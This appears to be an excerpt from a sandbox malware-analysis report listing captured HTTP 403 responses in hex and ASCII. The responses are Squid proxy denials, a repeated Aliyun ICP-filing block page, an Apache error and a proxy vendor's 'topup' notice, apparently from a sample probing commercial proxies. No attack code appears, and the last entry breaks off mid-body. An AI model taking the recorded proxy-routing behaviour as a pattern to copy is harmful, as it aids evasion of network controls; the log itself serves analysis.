Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:18 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/4.7Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:18 GMTContent-Type: text/html;charset=utf-8Content-Length: 5X-Squid-Error: TCP_RESET 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from proxy.wakoopa.comVia: 1.1 proxy.wakoopa.com (squid/4.7)Connection: keep-aliveData Raw: 72 65 73 65 74 Data Ascii: reset
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/6.0.0-20220501-re899e0c27Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:18 GMTContent-Type: text/html;charset=utf-8Content-Length: 3670X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enCache-Status: ezproxies.comVia: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:14:19 GMTServer: ApacheContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:19 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:14:19 GMTContent-Length: 101Content-Type: text/plain; charset=utf-8Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:14:19 GMTContent-Length: 101Content-Type: text/plain; charset=utf-8Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP 